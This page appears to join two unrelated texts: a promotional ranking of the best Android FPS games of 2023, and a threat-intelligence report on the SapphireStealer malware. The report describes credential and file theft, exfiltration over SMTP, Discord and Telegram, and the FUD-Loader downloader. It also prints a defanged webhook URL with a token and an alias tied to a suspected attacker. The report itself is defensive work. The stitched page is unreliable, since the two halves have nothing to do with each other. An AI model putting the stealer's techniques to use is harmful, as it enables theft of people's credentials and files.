In recent years, the mobile gaming industry has witnessed a significant rise in first-person shooter (FPS) games. The year 2023 is well underway, Android users can expect an array of high-quality FPS games that have gained popularity by demand. This article aims to explore the best FPS games available on Android and analyze their appeal to gamers.

At the forefront of this trend is Call of Duty Mobile, which offers a thrilling multiplayer experience with its immersive gameplay and impressive graphics. Additionally, PUBG Mobile continues to captivate players with its intense battle royale mode, providing an adrenaline-fueled gaming experience.

Moreover, Apex Legends Mobile has emerged as a strong contender in the realm of FPS games on Android, offering dynamic gameplay and strategic team-based battles. These three titles exemplify how Android is leading the mobile gaming race by delivering top-notch FPS experiences for enthusiasts.

As we delve deeper into each game’s features and mechanics, it becomes evident why they have become favourites among gamers worldwide. By examining their success and analyzing player feedback, we can understand why these games are in such high demand on Android devices in 2023.

**The Rise of FPS Mobile Gaming in 2023**

In 2023, the popularity of FPS mobile gaming has experienced a significant rise, with Call of Duty Mobile emerging as the highest-played mobile FPS game, followed by PUBG Mobile and Apex Legends Mobile, according to a study by SecureCheats analyzing Google search data and player statistics. 

This study conducted by SecureCheats employed an analysis of Google search data and player statistics from the last 12 months to determine the most popular mobile FPS games. Each game was assigned its own total score based on these factors.

Call of Duty Mobile secured the top position in this study, affirming its widespread appeal among gamers. The game offers an immersive first-person shooting experience coupled with impressive graphics and a wide array of gameplay modes. 

PUBG Mobile claimed the second spot in this ranking, showcasing its enduring popularity within the FPS genre. Known for its intense battle royale matches and realistic gunplay mechanics, PUBG Mobile continues to captivate players worldwide.

Apex Legends Mobile secured the third place in this ranking, demonstrating its growing presence in the realm of mobile FPS gaming. With fast-paced gameplay and unique character abilities, it has garnered a dedicated fanbase.

The rise of FPS mobile gaming is evident through these rankings, indicating that players are increasingly gravitating towards engaging and competitive experiences on their smartphones. The dominance of Call of Duty Mobile further reinforces its status as a leading force within this genre.

**Call of Duty Mobile**

Call of Duty Mobile has gained significant traction among gamers for its immersive gameplay experience and realistic graphics. Developed by Tencent Games in collaboration with Activision, this first-person shooter (FPS) game offers a thrilling multiplayer mode that allows players to engage in fast-paced combat across various iconic maps from the Call of Duty franchise.

One of the key strengths of Call of Duty Mobile is its attention to detail in replicating the gameplay mechanics and overall feel of the popular console version. The controls have been optimized for touchscreens, providing smooth and responsive movements that enhance the overall gaming experience. Additionally, players can choose from a wide range of customizable load-outs, allowing them to tailor their playstyle to their preferences.

The graphics in Call of Duty Mobile are impressive, delivering stunning visuals that rival those seen on dedicated gaming consoles. From detailed character models to dynamic environments, every aspect contributes to creating an immersive world for players to explore.

Furthermore, regular updates and additions keep the game fresh and engaging. New maps, game modes, and weapons are frequently introduced, ensuring that players always have something new to discover.

Overall, Call of Duty Mobile stands as a testament to the ever-increasing quality and popularity of FPS games on mobile platforms. Its immersive gameplay experience coupled with realistic graphics make it a top choice among gamers seeking intense action on their Android devices.

**PUBG Mobile**

Developed by PUBG Corporation, PUBG Mobile has captivated gamers worldwide with its expansive open-world gameplay and intense battle royale experience. Released in 2018, the game quickly became a sensation, garnering millions of downloads and earning critical acclaim for its immersive and realistic gameplay.

PUBG Mobile offers players a highly competitive and adrenaline-fueled experience. The game drops 100 players onto an island where they must scavenge for weapons, vehicles, and supplies while eliminating opponents to become the last person standing. With its vast map and stunning graphics, PUBG Mobile provides an incredibly immersive environment that keeps players engaged.

One of the key aspects that sets PUBG Mobile apart from other FPS games is its focus on teamwork. Players can form squads with their friends or join forces with strangers to strategize and outmanoeuvre opponents. This cooperative element adds another layer of depth to the gameplay, fostering communication and coordination among teammates.

Furthermore, PUBG Mobile regularly updates its content to keep players engaged and excited. New maps, weapons, game modes, and events are introduced frequently, ensuring that there is always something fresh for players to explore.

Overall, PUBG Mobile’s combination of expansive open-world gameplay, intense battle royale action, teamwork-oriented mechanics, and regular updates makes it one of the best FPS games available on Android in 2023. Its popularity is a testament to its captivating nature and ability to provide an adrenaline-pumping gaming experience for mobile gamers worldwide.

Apex Legends Mobile, a highly anticipated addition to the popular battle royale genre, offers players an exhilarating and fast-paced gameplay experience. Developed by Respawn Entertainment, this free-to-play game brings the thrilling action of Apex Legends to Android devices.

*   Diverse roster of characters: Apex Legends Mobile features a diverse lineup of legends, each with their own unique abilities and playstyles. From aggressive brawlers to tactical support characters, players can choose from a variety of options that suit their preferred playstyle.
*   Intense squad-based gameplay: In Apex Legends Mobile, teamwork is crucial for victory. Players are encouraged to form squads of three and work together to outmanoeuvre and eliminate opponents. The game promotes strategic decision-making and effective communication among team members.
*   Dynamic map design: The game’s map is meticulously designed with various terrains, providing players with opportunities for both close-quarters combat and long-range engagements. Additionally, the inclusion of jump pads and ziplines adds verticality to the gameplay, allowing for dynamic movement across the map.

With its diverse character roster, intense squad-based gameplay, and dynamic map design, Apex Legends Mobile delivers an immersive experience that has captivated fans of the battle royale genre. As it continues to evolve in popularity on Android devices in 2023, Apex Legends Mobile solidifies its position as one of the best FPS games available on this platform.

**Android Leading the Mobile Gaming Race**

Android has emerged as a dominant force in the mobile gaming industry, displaying its prowess and adaptability by consistently attracting a wide range of players with its diverse selection of games.

With advancements in technology and hardware capabilities, Android has positioned itself as a leading platform for gaming enthusiasts. The popularity of Android devices can be attributed to their affordability, accessibility, and compatibility with various game genres.

One key advantage that Android has over other platforms is its open-source nature, allowing developers to create innovative and immersive gaming experiences. This has resulted in a vast library of high-quality games available on the Google Play Store, catering to different preferences and interests. 

Furthermore, Android’s ability to support high-end graphics and smooth gameplay enhances the overall user experience.

Additionally, the integration of cloud gaming services such as Google Stadia and NVIDIA GeForce Now further solidifies Android’s position as a frontrunner in the mobile gaming race. These services allow users to stream console-level games directly onto their Android devices without compromising on performance or visual quality.

As more developers continue to prioritize Android development due to its market share and user base, it is expected that the platform will continue to dominate the mobile gaming industry in 2023 and beyond. Its adaptability, diverse game selection, affordability, and technological advancements make it an attractive choice for both casual gamers and hardcore enthusiasts alike.

The Best FPS Games on Android In 2023: Popular by Demand

SapphireStealer, an open-source information stealer, has been observed across public malware repositories with increasing frequency since its initial public release in December 2022.
Information-stealing malware like SapphireStealer can be used to obtain sensitive information, including corporate credentials, which are often resold to other threat actors who leverage the access for

*   SapphireStealer, an open-source information stealer, has been observed across public malware repositories with increasing frequency since its initial public release in December 2022.
*   Information-stealing malware like SapphireStealer can be used to obtain sensitive information, including corporate credentials, which are often resold to other threat actors who leverage the access for additional attacks, including operations related to espionage or ransomware/extortion.
*   We assess with moderate confidence that multiple entities are using SapphireStealer, who have improved and modified the original code base separately, extending it to support additional data exfiltration mechanisms leading to the creation of several variants.
*   In some cases, SapphireStealer appears to be delivered as part of a multi-stage infection process, with threat actors leveraging open-source malware downloaders like FUD-Loader to deliver SapphireStealer to potential victims.

**SapphireStealer goes open-source, attackers take notice**

Information stealers have become increasingly popular across the threat landscape over the past several years. While these threats have been around for a very long time, Cisco Talos has recently observed an increase in the emergence of new stealers being offered for sale or rent on various underground forums and marketplaces. Stealers are often seen as an attractive option for financially motivated threat actors, as they provide a simple means to compromise and distribute sensitive information and account-related details to adversaries. These credentials often include corporate account credentials, access tokens and other data that can then be used to further compromise corporate networks. In many cases, the credential logs generated by information stealers are monetized and the network access they provide is sold to other threat actors who may use them to begin operating toward various post-compromise mission objectives, such as espionage or ransomware/extortion.

SapphireStealer is an example of a new information stealer, primarily designed to facilitate the theft of various browser credential databases and files that may contain sensitive user information. SapphireStealer’s codebase was published on GitHub on Dec. 25, 2022.

As is often the case following the release of a new open-source malware codebase, threat actors acted quickly, beginning to experiment with this stealer, extending it to support additional functionality, and using other tooling to make the detection of SapphireStealer infections more difficult.

Newly compiled versions of SapphireStealer began being uploaded to public malware repositories beginning in mid-January 2023, with consistent upload activity being observed through the first half of 2023. Compilation artifacts associated with these samples indicate that this malware codebase is currently being used by multiple threat actors. Multiple variants of this threat are already in the wild, and threat actors are improving on its efficiency and effectiveness over time.  

While most of the samples featured forged compilation timestamps, using the date on which the samples were initially uploaded to public repositories and compilation artifacts like PDB pathways allowed us to cluster malware activity and identify distinct development activity occurring.

**SapphireStealer enables simple but effective credential and data theft**

SapphireStealer is an information stealer that was written in .NET. It offers straightforward but effective functionality capable of stealing sensitive information from infected systems including:

*   Host information.
*   Screenshots.
*   Cached browser credentials.
*   Files stored on the system that match a predefined list of file extensions.

When the malware is initially executed, it first attempts to determine if any existing browser processes are running on the system. It queries the currently running process list for any process names that match the following list:

*   chrome
*   yandex
*   msedge
*   opera

If any matching processes are detected, the malware uses Process.Kill() to terminate them. This code execution for Google Chrome is shown below.

Next, the malware calls Chromium.Get() to check for various browser database file directories under %APPDATA% or %LOCALAPPDATA%. The malware uses a hard-coded list of paths to identify the presence of credential databases for the following browser applications:

*   Chrome
*   Opera
*   Yandex
*   Brave Browser
*   Orbitum Browser
*   Atom Browser
*   Kometa Browser
*   Microsoft Edge
*   Torch Browser
*   Amigo
*   CocCoc
*   Comodo Dragon
*   Epic Privacy Browser
*   Elements Browser
*   CentBrowser
*   360 Browser

The malware creates a working directory at the following location to stage the data that will ultimately be exfiltrated:

%TEMP%\sapphire\work

The contents of any credential databases that are discovered are dumped. This information is then stored in a text file within the malware’s working directory called Passwords.txt.

Next, the malware attempts to capture a screenshot from the system and stores it within the same working directory within a file called Screenshot.png.

The malware creates a new subdirectory called \`Files\` within the malware’s working directory. A file grabber is then executed that attempts to locate any files stored within the victim’s Desktop folder that match a list of file extensions. The list varied across analyzed samples, but an example list is shown below:

*   .txt
*   .pdf
*   .doc
*   .docx
*   .xml
*   .img
*   .jpg
*   .png

Once the file grabber has completed execution, the malware then creates a compressed archive called log.zip containing all of the logs that were previously written to the malware’s working directory.

This data is then transmitted to the attacker via Simple Mail Transfer Protocol (SMTP) using credentials defined in the portion of code responsible for crafting and sending the message.

The following host-related information is collected and included in the body of the email message:

*   IP address
*   Hostname
*   Screen resolution
*   OS version and CPU architecture
*   ProcessorId
*   GPU Information

Once the logs have been successfully exfiltrated, the malware then deletes the working directory created earlier and terminates execution.

**SapphireStealer extended to support additional exfiltration methods**

Since initial samples began being uploaded to public malware repositories and scanning platforms, we’ve observed several notable modifications made by various threat actors. Most of the development effort appears to have been focused on facilitating more flexible data exfiltration and alerting for attackers that achieve new SapphireStealer infections. As this malware is open-source and being used by multiple distinct threat actors, much of this development activity has occurred independently and new functionality is not present in sample clusters associated with other threat actors.

In one case, we observed a SapphireStealer sample where the data collected using the previously described process was exfiltrated using the Discord webhook API, a method we previously highlighted here.

In this case, the Discord webhook URL (SendLog.url) was:

hxxps[:]//discord[.]com/api/webhooks/1123664977618817094/La_3GaXooH42oGRiy8o7sazh1Cg0V_mzkH67VryfSB1MCOlYee1_JPMCNsfOTji7J9jO

In several cases, we also observed SapphireStealer samples that featured the ability to alert attackers to newly acquired infections by transmitting the log data via the Telegram posting API.

In addition, we also observed variations in the file extensions being targeted for collection and exfiltration by the FileGrabber functionality present within SapphireStealer. While some were minimal, only containing a few file extensions, others contained a myriad of different file formats that the attacker could obtain.

Likewise, earlier versions of SapphireStealer featured redundant code execution, repeated superfluous executions of the same operations multiple times, and overall inefficiencies. During our analysis of other SapphireStealer samples over time, we observed repeated evidence that various threat actors had taken steps to streamline the malware’s operations, refactor the code significantly, and otherwise improve upon the core functionality of the stealer.

**FUD-Loader used in multi-stage infections**

In several cases, we observed threat actors attempting to leverage a malware downloader, called FUD-Loader which was also made available via the same GitHub account. This downloader was initially committed to GitHub on January 2, 2023, shortly after the initial code commit of SapphireStealer. Since its release, it’s been used by a variety of threats during the initial stages of the infection process to retrieve additional binary payloads from attacker-controlled distribution servers.

This loader, like SapphireStealer, was written in .NET and features fairly simplistic operations. It is essentially responsible for leveraging HTTP/HTTPS communications to retrieve additional executables from attacker-controlled infrastructure, saving the retrieved content to disk, and then executing it to continue the infection process.

In most of the cases where this loader was used, it retrieved the SapphireStealer binary payloads being hosted on the infrastructure described in the next section, allowing us to attribute those samples to the same threat actor.

Throughout the course of 2023, we have also observed this downloader being used to deliver various other threats such as DcRat, njRAT, DarkComet, AgentTesla and more.

**A case study in operational security (OPSEC) failure**

In one cluster of malware activity we analyzed, we observed multiple failures on the part of the threat actor to maintain sound operational security. In one sample, we observed the presence of the following Program Database (PDB) pathway still present post-compilation:

C:\Users\roman\OneDrive\Рабочий стол\straler\net452\new_game.pdb

This sample was configured to use SMTP for data exfiltration and leveraged the following hardcoded credentials.

These credentials were also hardcoded into another sample we analyzed.

We observed that this second sample featured a different PDB, which contained a specific typographical error in the PDB pathway.

D:\C# proect\Sapphire\obj\Debug\Sapphire.pdb

An earlier sample featured the same PDB pathway and the same typographical error. In this case, the threat actor hardcoded personally identifiable SMTP account information for data exfiltration.

Looking for additional accounts that featured the handle/alias “romanmaslov200” led us to a variety of personal accounts that may be associated with the threat actor, such as an account for Steam, a popular video game storefront.

Two of these three samples were also observed being hosted at the following URL at various times:

In addition to the aforementioned Steam account, we also identified a matching account on a Russian language freelance forum. This account was being used to advertise freelance web development services. The user profile also lists the domain observed hosting SapphireStealer samples and various dependency components retrieved for parsing credential databases and exfiltrating the data.

One of the byproducts of readily available and open-source malware codebases is that the barrier to entry into financially motivated cybercrime has continued to decrease over time. This trend has become apparent when analyzing campaigns run by individuals or groups that demonstrate inexperience in establishing operational security throughout the various stages of the attack lifecycle. While it may take less operational expertise to conduct information stealer attacks, they can be extremely damaging to corporate environments as the data stolen is often leveraged for additional attacks at a later time.

**Coverage**

Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

The following Snort SIDs are applicable to this threat: 62243-62247.

**Orbital Queries**

Cisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are infected with this specific threat. For specific OSqueries on this threat, click here.

**Indicators of Compromise**

IOCs for this research can also be found at our Github repository here

Tag

#google